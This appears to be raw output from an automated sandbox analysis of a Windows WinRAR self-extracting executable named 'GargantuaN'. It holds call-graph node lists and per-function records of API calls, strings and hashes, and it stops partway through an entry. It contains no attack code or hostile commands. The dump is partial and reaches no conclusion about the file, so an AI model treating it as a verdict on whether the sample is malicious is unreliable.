GetCurrentDirectoryW 23605->23606 23607 d5bb39 _wcslen 23605->23607 23606->23607 23607->23600 23609 d5407c __vswprintf_c_l 23608->23609 23612 d75fd4 23609->23612 23615 d74097 23612->23615 23616 d740d7 23615->23616 23617 d740bf 23615->23617 23616->23617 23619 d740df 23616->23619 23632 d791a8 20 API calls _abort 23617->23632 23634 d74636 23619->23634 23620 d740c4 23633 d79087 26 API calls ___std_exception_copy 23620->23633 23624 d740cf 23645 d6fbbc 23624->23645 23627 d74167 23643 d749e6 51 API calls 4 library calls 23627->23643 23628 d54086 GetFileAttributesW 23628->23531 23628->23535 23631 d74172 23644 d746b9 20 API calls _free 23631->23644 23632->23620 23633->23624 23635 d74653 23634->23635 23641 d740ef 23634->23641 23635->23641 23652 d797e5 GetLastError 23635->23652 23637 d74674 23672 d7993a 38 API calls __cftof 23637->23672 23639 d7468d 23673 d79967 38 API calls __cftof 23639->23673 23642 d74601 20 API calls 2 library calls 23641->23642 23642->23627 23643->23631 23644->23624 23646 d6fbc4 23645->23646 23647 d6fbc5 IsProcessorFeaturePresent 23645->23647 23646->23628 23649 d6fc07 23647->23649 23694 d6fbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23649->23694 23651 d6fcea 23651->23628 23653 d79801 23652->23653 23654 d797fb 23652->23654 23658 d79850 SetLastError 23653->23658 23675 d7b136 23653->23675 23674 d7ae5b 11 API calls 2 library calls 23654->23674 23658->23637 23659 d7981b 23682 d78dcc 23659->23682 23662 d79830 23662->23659 23664 d79837 23662->23664 23663 d79821 23665 d7985c SetLastError 23663->23665 23689 d79649 20 API calls _abort 23664->23689 23690 d78d24 38 API calls _abort 23665->23690 23667 d79842 23669 d78dcc _free 20 API calls 23667->23669 23671 d79849 23669->23671 23671->23658 23671->23665 23672->23639 23673->23641 23674->23653 23681 d7b143 _abort 23675->23681 23676 d7b183 23692 d791a8 20 API calls _abort 23676->23692 23677 d7b16e RtlAllocateHeap 23679 d79813 23677->23679 23677->23681 23679->23659 23688 d7aeb1 11 API calls 2 library calls 23679->23688 23681->23676 23681->23677 23691 d77a5e 7 API calls 2 library calls 23681->23691 23683 d78dd7 RtlFreeHeap 23682->23683 23687 d78e00 __dosmaperr 23682->23687 23684 d78dec 23683->23684 23683->23687 23693 d791a8 20 API calls _abort 23684->23693 23686 d78df2 GetLastError 23686->23687 23687->23663 23688->23662 23689->23667 23691->23681 23692->23679 23693->23686 23694->23651 23696 d78e44 23695->23696 23700 d78e14 _abort 23695->23700 23705 d791a8 20 API calls _abort 23696->23705 23697 d78e2f RtlAllocateHeap 23699 d78e42 23697->23699 23697->23700 23699->23584 23700->23696 23700->23697 23704 d77a5e 7 API calls 2 library calls 23700->23704 23702->23584 23703->23586 23704->23700 23705->23699 25368 d6a440 GdipCloneImage GdipAlloc 25420 d73a40 5 API calls _ValidateLocalCookies 25439 d81f40 CloseHandle 23752 d6e44b 23753 d6e3f4 23752->23753 23753->23752 23754 d6e85d ___delayLoadHelper2@8 14 API calls 23753->23754 23754->23753 25369 d51075 84 API calls 23756 d59a74 23757 d59a7e 23756->23757 23758 d59b9d SetFilePointer 23757->23758 23761 d59b79 23757->23761 23762 d59ab1 23757->23762 23763 d5981a 23757->23763 23759 d59bb6 GetLastError 23758->23759 23758->23762 23759->23762 23761->23758 23764 d59833 23763->23764 23767 d59e80 23764->23767 23768 d59e92 23767->23768 23771 d59ea5 23767->23771 23773 d59865 23768->23773 23776 d56d5b 77 API calls 23768->23776 23770 d59eb8 SetFilePointer 23772 d59ed4 GetLastError 23770->23772 23770->23773 23771->23770 23771->23773 23772->23773 23774 d59ede 23772->23774 23773->23761 23774->23773 23777 d56d5b 77 API calls 23774->23777 23776->23771 23777->23773 25370 d6a070 10 API calls 25421 d6b270 99 API calls 25441 d51f72 128 API calls __EH_prolog 23825 d59f7a 23826 d59f8f 23825->23826 23827 d59f88 23825->23827 23828 d59f9c GetStdHandle 23826->23828 23835 d59fab 23826->23835 23828->23835 23829 d5a003 WriteFile 23829->23835 23830 d59fd4 WriteFile 23831 d59fcf 23830->23831 23830->23835 23831->23830 23831->23835 23833 d5a095 23837 d56e98 77 API calls 23833->23837 23835->23827 23835->23829 23835->23830 23835->23831 23835->23833 23836 d56baa 78 API calls 23835->23836 23836->23835 23837->23827 25442 d77f6e 52 API calls 3 library calls 25373 d6c793 107 API calls 4 library calls 24714 d6e569 24715 d6e517 24714->24715 24716 d6e85d ___delayLoadHelper2@8 14 API calls 24715->24716 24716->24715 25422 d78268 55 API calls _free 25443 d51710 86 API calls 25404 d6ad10 73 API calls 25376 d6a400 GdipDisposeImage GdipFree 25423 d6d600 70 API calls 25377 d76000 QueryPerformanceFrequency QueryPerformanceCounter 25407 d72900 6 API calls 4 library calls 25424 d7f200 51 API calls 25445 d7a700 21 API calls 25409 d6f530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25446 d6ff30 LocalFree 25215 d7bb30 25216 d7bb42 25215->25216 25217 d7bb39 25215->25217 25219 d7ba27 25217->25219 25220 d797e5 _abort 38 API calls 25219->25220 25221 d7ba34 25220->25221 25239 d7bb4e 25221->25239 25223 d7ba3c 25248 d7b7bb 25223->25248 25226 d7ba53 25226->25216 25227 d78e06 __vsnwprintf_l 21 API calls 25228 d7ba64 25227->25228 25229 d7ba96 25228->25229 25255 d7bbf0 25228->25255 25231 d78dcc _free 20 API calls 25229->25231 25231->25226 25233 d7ba91 25265 d791a8 20 API calls _abort 25233->25265 25235 d7bada 25235->25229 25266 d7b691 26 API calls 25235->25266 25236 d7baae 25236->25235 25237 d78dcc _free 20 API calls 25236->25237 25237->25235 25240 d7bb5a __FrameHandler3::FrameUnwindToState 25239->25240 25241 d797e5 _abort 38 API calls 25240->25241 25246 d7bb64 25241->25246 25243 d7bbe8 _abort 25243->25223 25246->25243 25247 d78dcc _free 20 API calls 25246->25247 25267 d78d24 38 API calls _abort 25246->25267 25268 d7ac31 EnterCriticalSection 25246->25268 25269 d7bbdf LeaveCriticalSection _abort 25246->25269 25247->25246 25249 d74636 __cftof 38 API calls 25248->25249 25250 d7b7cd 25249->25250 25251 d7b7ee 25250->25251 25252 d7b7dc GetOEMCP 25250->25252 25253 d7b805 25251->25253 25254 d7b7f3 GetACP 25251->25254 25252->25253 25253->25226 25253->25227 25254->25253 25256 d7b7bb 40 API calls 25255->25256 25257 d7bc0f 25256->25257 25259 d7bc60 IsValidCodePage 25257->25259 25262 d7bc16 25257->25262 25264 d7bc85 _abort 25257->25264 25258 d6fbbc _ValidateLocalCookies 5 API calls 25260 d7ba89 25258->25260 25261 d7bc72 GetCPInfo 25259->25261 25259->25262 25260->25233 25260->25236 25261->25262 25261->25264 25262->25258 25270 d7b893 GetCPInfo 25264->25270 25265->25229 25266->25229 25268->25246 25269->25246 25271 d7b977 25270->25271 25277 d7b8cd 25270->25277 25274 d6fbbc _ValidateLocalCookies 5 API calls 25271->25274 25276 d7ba23 25274->25276 25276->25262 25280 d7c988 25277->25280 25279 d7ab78 __vsnwprintf_l 43 API calls 25279->25271 25281 d74636 __cftof 38 API calls 25280->25281 25282 d7c9a8 MultiByteToWideChar 25281->25282 25285 d7c9e6 25282->25285 25292 d7ca7e 25282->25292 25284 d6fbbc _ValidateLocalCookies 5 API calls 25287 d7b92e 25284->25287 25286 d78e06 __vsnwprintf_l 21 API calls 25285->25286 25290 d7ca07 _abort __vsnwprintf_l 25285->25290 25286->25290 25294 d7ab78 25287->25294 25288 d7ca78 25299 d7abc3 20 API calls _free 25288->25299 25290->25288 25291 d7ca4c MultiByteToWideChar 25290->25291 25291->25288 25293 d7ca68 GetStringTypeW 25291->25293 25292->25284 25293->25288 25295 d74636 __cftof 38 API calls 25294->25295 25296 d7ab8b 25295->25296 25300 d7a95b 25296->25300 25299->25292 25301 d7a976 __vsnwprintf_l 25300->25301 25302 d7a99c MultiByteToWideChar 25301->25302 25303 d7a9c6 25302->25303 25304 d7ab50 25302->25304 25308 d78e06 __vsnwprintf_l 21 API calls 25303->25308 25310 d7a9e7 __vsnwprintf_l 25303->25310 25305 d6fbbc _ValidateLocalCookies 5 API calls 25304->25305 25306 d7ab63 25305->25306 25306->25279 25307 d7aa30 MultiByteToWideChar 25309 d7aa49 25307->25309 25322 d7aa9c 25307->25322 25308->25310 25327 d7af6c 25309->25327 25310->25307 25310->25322 25314 d7aa73 25317 d7af6c __vsnwprintf_l 11 API calls 25314->25317 25314->25322 25315 d7aaab 25316 d78e06 __vsnwprintf_l 21 API calls 25315->25316 25319 d7aacc __vsnwprintf_l 25315->25319 25316->25319 25317->25322 25318 d7ab41 25335 d7abc3 20 API calls _free 25318->25335 25319->25318 25320 d7af6c __vsnwprintf_l 11 API calls 25319->25320 25323 d7ab20 25320->25323 25336 d7abc3 20 API calls _free 25322->25336 25323->25318 25324 d7ab2f WideCharToMultiByte 25323->25324 25324->25318 25325 d7ab6f 25324->25325 25337 d7abc3 20 API calls _free 25325->25337 25328 d7ac98 _abort 5 API calls 25327->25328 25329 d7af93 25328->25329 25332 d7af9c 25329->25332 25338 d7aff4 10 API calls 3 library calls 25329->25338 25331 d7afdc LCMapStringW 25331->25332 25333 d6fbbc _ValidateLocalCookies 5 API calls 25332->25333 25334 d7aa60 25333->25334 25334->25314 25334->25315 25334->25322 25335->25322 25336->25304 25337->25322 25338->25331 25380 d7c030 GetProcessHeap 25381 d51025 29 API calls 25382 d7f421 21 API calls __vsnwprintf_l 25425 d6c220 93 API calls _swprintf 25410 d7b4ae 27 API calls _ValidateLocalCookies

                                                        Executed Functions

                                                        Function 00D6DF1E Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 195filesleeptimeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00D60863: GetModuleHandleW.KERNEL32(kernel32), ref: 00D6087C
                                                          • Part of subcall function 00D60863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00D6088E
                                                          • Part of subcall function 00D60863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00D608BF
                                                          • Part of subcall function 00D6A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00D6A655
                                                          • Part of subcall function 00D6AC16: OleInitialize.OLE32(00000000), ref: 00D6AC2F
                                                          • Part of subcall function 00D6AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00D6AC66
                                                          • Part of subcall function 00D6AC16: SHGetMalloc.SHELL32(00D98438), ref: 00D6AC70
                                                        • GetCommandLineW.KERNEL32 ref: 00D6DF5C
                                                        • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00D6DF83
                                                        • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00D6DF94
                                                        • UnmapViewOfFile.KERNEL32(00000000), ref: 00D6DFCE
                                                          • Part of subcall function 00D6DBDE: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 00D6DBF4
                                                          • Part of subcall function 00D6DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00D6DC30
                                                        • CloseHandle.KERNEL32(00000000), ref: 00D6DFD7
                                                        • GetModuleFileNameW.KERNEL32(00000000,00DAEC90,00000800), ref: 00D6DFF2
                                                        • SetEnvironmentVariableW.KERNEL32(sfxname,00DAEC90), ref: 00D6DFFE
                                                        • GetLocalTime.KERNEL32(?), ref: 00D6E009
                                                        • _swprintf.LIBCMT ref: 00D6E048
                                                        • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00D6E05A
                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00D6E061
                                                        • LoadIconW.USER32(00000000,00000064), ref: 00D6E078
                                                        • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00D6E0C9
                                                        • Sleep.KERNEL32(?), ref: 00D6E0F7
                                                        • DeleteObject.GDI32 ref: 00D6E130
                                                        • DeleteObject.GDI32(?), ref: 00D6E140
                                                        • CloseHandle.KERNEL32 ref: 00D6E183
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                        • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\AppData\Local\Temp$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                        • API String ID: 3049964643-2070194233
                                                        • Opcode ID: 4e145b0a770e2c755f45965e8ca6565c5e598a338719ab5bd6535f06fa85fe65
                                                        • Instruction ID: 3fa0c1ed87f245fda8b6a45bd935cd812e670f86e69b3e100c40878c166df6e6
                                                        • Opcode Fuzzy Hash: 4e145b0a770e2c755f45965e8ca6565c5e598a338719ab5bd6535f06fa85fe65
                                                        • Instruction Fuzzy Hash: 9E61D375A04345AFD320ABB5EC49F2B77ADEF46B00F04042AF949D2391DB789948D771
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D5A69B Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1030 d5a69b-d5a6bf call d6ec50 1033 d5a727-d5a730 FindNextFileW 1030->1033 1034 d5a6c1-d5a6ce FindFirstFileW 1030->1034 1035 d5a742-d5a7ff call d60602 call d5c310 call d615da * 3 1033->1035 1036 d5a732-d5a740 GetLastError 1033->1036 1034->1035 1037 d5a6d0-d5a6e2 call d5bb03 1034->1037 1041 d5a804-d5a811 1035->1041 1038 d5a719-d5a722 1036->1038 1045 d5a6e4-d5a6fc FindFirstFileW 1037->1045 1046 d5a6fe-d5a707 GetLastError 1037->1046 1038->1041 1045->1035 1045->1046 1047 d5a717 1046->1047 1048 d5a709-d5a70c 1046->1048 1047->1038 1048->1047 1050 d5a70e-d5a711 1048->1050 1050->1047 1052 d5a713-d5a715 1050->1052 1052->1038
                                                        APIs
                                                        • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00D5A592,000000FF,?,?), ref: 00D5A6C4
                                                          • Part of subcall function 00D5BB03: _wcslen.LIBCMT ref: 00D5BB27
                                                        • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00D5A592,000000FF,?,?), ref: 00D5A6F2
                                                        • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00D5A592,000000FF,?,?), ref: 00D5A6FE
                                                        • FindNextFileW.KERNEL32(?,?,?,?,?,?,00D5A592,000000FF,?,?), ref: 00D5A728
                                                        • GetLastError.KERNEL32(?,?,?,?,00D5A592,000000FF,?,?), ref: 00D5A734
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                        • String ID:
                                                        • API String ID: 42610566-0
                                                        • Opcode ID: 8dce678c9476814d1ff9957c2f570946085dbc9148cae9f6996ff95b398c78ff
                                                        • Instruction ID: c05a94c9b5010b3c9a110b4c8f4ab1fbedb9c5a6e9cd0e7dd8a8c8b99e5183f6
                                                        • Opcode Fuzzy Hash: 8dce678c9476814d1ff9957c2f570946085dbc9148cae9f6996ff95b398c78ff
                                                        • Instruction Fuzzy Hash: 4C417176900625ABCB25DF68CC84AE9B7B8FB48351F144296ED5ED3200D734AE94CFB0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D77DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(00000000,?,00D77DC4,00000000,00D8C300,0000000C,00D77F1B,00000000,00000002,00000000), ref: 00D77E0F
                                                        • TerminateProcess.KERNEL32(00000000,?,00D77DC4,00000000,00D8C300,0000000C,00D77F1B,00000000,00000002,00000000), ref: 00D77E16
                                                        • ExitProcess.KERNEL32 ref: 00D77E28
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: Process$CurrentExitTerminate
                                                        • String ID:
                                                        • API String ID: 1703294689-0
                                                        • Opcode ID: ff72f24314c05184cee69dd12a769f48ad0c0440a0394c46cb2a1ca501689813
                                                        • Instruction ID: abe244dfa6605a7049d059e78ebba1aa3461f4990a93f61749e1488bd9e27505
                                                        • Opcode Fuzzy Hash: ff72f24314c05184cee69dd12a769f48ad0c0440a0394c46cb2a1ca501689813
                                                        • Instruction Fuzzy Hash: 67E0B631014348ABCF116F64DD49A5A7F6AEB50B51B048854F81DCA232DB36DE92DBB0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D5848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: H_prolog
                                                        • String ID:
                                                        • API String ID: 3519838083-0
                                                        • Opcode ID: 1ba5507b45de34c0ca60f8c3e0856d404115ce095d7ce759d987961ffe88f002
                                                        • Instruction ID: 3c288d127222bca6fff594a9dd765f5894e0994df958fabad62089d28bd0bde2
                                                        • Opcode Fuzzy Hash: 1ba5507b45de34c0ca60f8c3e0856d404115ce095d7ce759d987961ffe88f002
                                                        • Instruction Fuzzy Hash: 8182FB71904285AEDF15DF64C891BFABBB9AF15302F0C41B9EC49AB142DB315A8CDB70
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6B7E0 Relevance: 102.2, APIs: 48, Strings: 10, Instructions: 731windowfilesleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00D6B7E5
                                                          • Part of subcall function 00D51316: GetDlgItem.USER32(00000000,00003021), ref: 00D5135A
                                                          • Part of subcall function 00D51316: SetWindowTextW.USER32(00000000,00D835F4), ref: 00D51370
                                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00D6B8D1
                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D6B8EF
                                                        • IsDialogMessageW.USER32(?,?), ref: 00D6B902
                                                        • TranslateMessage.USER32(?), ref: 00D6B910
                                                        • DispatchMessageW.USER32(?), ref: 00D6B91A
                                                        • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00D6B93D
                                                        • EndDialog.USER32(?,00000001), ref: 00D6B960
                                                        • GetDlgItem.USER32(?,00000068), ref: 00D6B983
                                                        • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00D6B99E
                                                        • SendMessageW.USER32(00000000,000000C2,00000000,00D835F4), ref: 00D6B9B1
                                                          • Part of subcall function 00D6D453: _wcslen.LIBCMT ref: 00D6D47D
                                                        • SetFocus.USER32(00000000), ref: 00D6B9B8
                                                        • _swprintf.LIBCMT ref: 00D6BA24
                                                          • Part of subcall function 00D54092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D540A5
                                                          • Part of subcall function 00D6D4D4: GetDlgItem.USER32(00000068,00DAFCB8), ref: 00D6D4E8
                                                          • Part of subcall function 00D6D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,00D6AF07,00000001,?,?,00D6B7B9,00D8506C,00DAFCB8,00DAFCB8,00001000,00000000,00000000), ref: 00D6D510
                                                          • Part of subcall function 00D6D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00D6D51B
                                                          • Part of subcall function 00D6D4D4: SendMessageW.USER32(00000000,000000C2,00000000,00D835F4), ref: 00D6D529
                                                          • Part of subcall function 00D6D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00D6D53F
                                                          • Part of subcall function 00D6D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00D6D559
                                                          • Part of subcall function 00D6D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00D6D59D
                                                          • Part of subcall function 00D6D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00D6D5AB
                                                          • Part of subcall function 00D6D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00D6D5BA
                                                          • Part of subcall function 00D6D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00D6D5E1
                                                          • Part of subcall function 00D6D4D4: SendMessageW.USER32(00000000,000000C2,00000000,00D843F4), ref: 00D6D5F0
                                                        • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00D6BA68
                                                        • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00D6BA90
                                                        • GetTickCount.KERNEL32 ref: 00D6BAAE
                                                        • _swprintf.LIBCMT ref: 00D6BAC2
                                                        • GetLastError.KERNEL32(?,00000011), ref: 00D6BAF4
                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00D6BB43
                                                        • _swprintf.LIBCMT ref: 00D6BB7C
                                                        • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00D6BBD0
                                                        • GetCommandLineW.KERNEL32 ref: 00D6BBEA
                                                        • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00D6BC47
                                                        • ShellExecuteExW.SHELL32(0000003C), ref: 00D6BC6F
                                                        • Sleep.KERNEL32(00000064), ref: 00D6BCB9
                                                        • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00D6BCE2
                                                        • CloseHandle.KERNEL32(00000000), ref: 00D6BCEB
                                                        • _swprintf.LIBCMT ref: 00D6BD1E
                                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00D6BD7D
                                                        • SetDlgItemTextW.USER32(?,00000065,00D835F4), ref: 00D6BD94
                                                        • GetDlgItem.USER32(?,00000065), ref: 00D6BD9D
                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00D6BDAC
                                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00D6BDBB
                                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00D6BE68
                                                        • _wcslen.LIBCMT ref: 00D6BEBE
                                                        • _swprintf.LIBCMT ref: 00D6BEE8
                                                        • SendMessageW.USER32(?,00000080,00000001,?), ref: 00D6BF32
                                                        • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00D6BF4C
                                                        • GetDlgItem.USER32(?,00000068), ref: 00D6BF55
                                                        • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00D6BF6B
                                                        • GetDlgItem.USER32(?,00000066), ref: 00D6BF85
                                                        • SetWindowTextW.USER32(00000000,00D9A472), ref: 00D6BFA7
                                                        • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00D6C007
                                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00D6C01A
                                                        • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00D6C0BD
                                                        • EnableWindow.USER32(00000000,00000000), ref: 00D6C197
                                                        • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00D6C1D9
                                                          • Part of subcall function 00D6C73F: __EH_prolog.LIBCMT ref: 00D6C744
                                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00D6C1FD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: Message$ItemSend$Text$Window$_swprintf$File$DialogErrorLast$H_prologLongView_wcslen$CloseCommandCountCreateDispatchEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmap__vswprintf_c_l
                                                        • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\AppData\Local\Temp$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                        • API String ID: 581453772-4182265032
                                                        • Opcode ID: fa929afb282410262b1eacd1ddfa0a48af387cf6e5eb2a8a5de761e4d176fa75
                                                        • Instruction ID: fd13e4dbd26d81c340c5a47eb4e28eb3d6a512208c4cfe63ba21d962f88e4fc9
                                                        • Opcode Fuzzy Hash: fa929afb282410262b1eacd1ddfa0a48af387cf6e5eb2a8a5de761e4d176fa75
                                                        • Instruction Fuzzy Hash: D842E671944344BFEB21ABB49C4AFBE7B6CEB02710F040156F944E62D2CB759A48DB71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D60863 Relevance: 52.8, APIs: 23, Strings: 7, Instructions: 316libraryfileloaderCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
